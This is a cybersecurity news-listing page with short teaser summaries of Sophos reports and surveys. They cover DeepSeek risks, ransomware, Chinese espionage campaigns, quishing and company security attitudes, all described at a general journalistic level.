News

Latest news on the subject of B2B cyber security >>> PR agencies: Add us to your mailing list - see contact! >>> Book an exclusive PartnerChannel for your news!

An assessment of DeepSeek
SophosNews

Because DeepSeek is based on open source, it can be explored and researched by both criminally motivated individuals and neutral enthusiasts. As with Meta's LLaMA, DeepSeek can be freely experimented with and the guardrails can largely be removed. This could lead to abuse by cybercriminals. However, operating DeepSeek professionally still requires far more resources than the average cybercriminal has at his disposal. Much more pressing for companies is the fact that DeepSeek is likely to be adopted by different products and companies due to its cost-effectiveness, which potentially poses significant risks to the...

Read more

Report: Trusted Windows applications abused

In its new Active Adversary Report 2024, Sophos proves the wolf in sheep's clothing: Cybercriminals are increasingly relying on trusted Windows applications for their attacks. Criminal use, commonly referred to as "living off the land" binaries, is increasing by 51 percent. Lockbit is the number 1 ransomware despite government intervention. Sophos' new Active Adversary Report, entitled "The Bite from Inside," provides a detailed look at the changing behaviors and techniques of attackers in the first half of 2024. The analysis data comes from almost 200 incident response cases that the Sophos X-Ops IR team and Sophos X-Ops Managed...

Read more

Cybertrends 2025 – what to expect
Cybertrends 2025 - what to expect Image: Bing - AI

What does 2025 mean for cyber security in companies? Which cyber attacks will become more frequent, which industries are particularly targeted and what role will AI play in the future? In cyber security, the last few years have shown that you have to expect anything. Since no one can see into the future, it is worth looking back at 2024 in order to evaluate developments, anticipate possible scenarios for the future and to adapt and look to a new year with confidence. Security is well positioned, but vigilance is and remains the top priority. Because...

Read more

XDR: AI functions detect and defend against threats
XDR: AI functions detect and ward off threats Image: Bing - AI

When it comes to detecting and neutralizing threats, every minute can be critical for security professionals, including managed service providers (MSPs). Generative AI features in Sophos XDR detect threats and repel them faster. To further optimize response and forensic investigations, Sophos has now enhanced its Extended Detection and Response (XDR) platform with new artificial intelligence (AI). The new generative AI features speed up and simplify investigations, allowing even less experienced analysts to target the necessary security operations and neutralize adversaries faster. The most important new features include: Optimized search...

Read more

DA-CH Cyber ​​Protection: Companies feel well positioned
Cyber ​​protection: Companies feel well positioned Image: Bing - AI

According to figures from the Sophos Management Study, the growing threat of cyber attacks and the resulting potential economic consequences have prompted most companies in Germany, Austria and Switzerland to invest even more in IT security and are now satisfied with their cyber protection. As a result, most companies are satisfied with the status of their cyber protection. In Switzerland, most of those surveyed (80 percent overall) feel well (66 percent) or very well (14 percent) prepared against cyber attacks. In Austria, too, people are satisfied with their cyber protection, here it is...

Read more

cat-and-mouse game with nation-state opponents in China
cat-and-mouse game with nation-state opponents in China

Sophos has published the report "Pacific Rim", which details a years-long cat-and-mouse game of attack and defense operations with several Chinese state-backed cybercrime groups. The attacks focused on cybersecurity perimeter devices, including Sophos firewalls. The attackers used a series of campaigns with novel exploits and tailored malware to embed tools for conducting surveillance, sabotage and cyberespionage, which also overlapped with tactics, tools and procedures (TTPs) of well-known Chinese nation-state groups such as Volt Typhoon, APT31 and APT41. The adversaries took out both small and large attacks, primarily in South and Southeast Asia.

Read more

Bosses think IT security is “easy”
Bosses think IT security is "easy"

One in four people responsible for IT security in companies have to listen to superiors accusing them of cyber security being very simple. External security services play a less important role in very small and very large companies than the average, but probably for very different reasons. After Sophos had asked IT employees in German SMEs and large companies about their stress levels, the causes and how their superiors deal with it, Sophos also wanted to find out about the difficulties in dealing with cyber security in different company sizes. Lack of qualified security experts and the rapid pace of cyber threats -...

Read more

Quishing: Phishing with QR codes
Quishing: Phishing with QR codes Image: Bing - AI

Following Albert Einstein, one could probably say that people's criminal ingenuity is infinite. The latest trend, quishing, proves once again that cyber criminals are not missing out on any opportunity. The experts at Sophos X-Ops have taken a closer look at the latest hype of infiltration via QR codes. When cyber criminals combine their phishing methods with actually quite harmless QR codes, they speak of "quishing". This new tactic has now become so popular that there are already entire campaigns about it. The analysts at Sophos X-Ops have just uncovered a coup in which a...

Read more

Chinese-sponsored espionage operation Crimson Palace
SophosNews

Sophos has released its new report, "Crimson Palace: New Tools, Tactics, Targets," a Chinese state-sponsored espionage operation. The report details the latest developments in a nearly two-year-long Chinese cyber espionage campaign in Southeast Asia. Sophos experts first reported their discoveries, titled Operation Crimson Palace, in June of this year, detailing their findings of Chinese state activity within a high-level government organization of three separate clusters - Cluster Alpha, Cluster Bravo and Cluster Charlie. After a brief pause in August 2023, Sophos X-Ops spotted renewed Cluster Bravo and Cluster Charlie activity...

Read more

Qilin ransomware steals login credentials from Chrome
SophosNews

During an investigation into a Qilin ransomware attack, the Sophos X-Ops team found that the attackers were stealing credentials stored in Google Chrome browsers on certain network endpoints. The Qilin group, which has been active for over two years, gained access through compromised credentials and manipulated group policies to run a PowerShell script to collect Chrome credentials. These scripts were activated when users logged in to collect the data. Attackers collect credentials using PowerShell script The cybercriminals used the PowerShell script to collect credentials from networked endpoints and were able to avoid the lack of…

Read more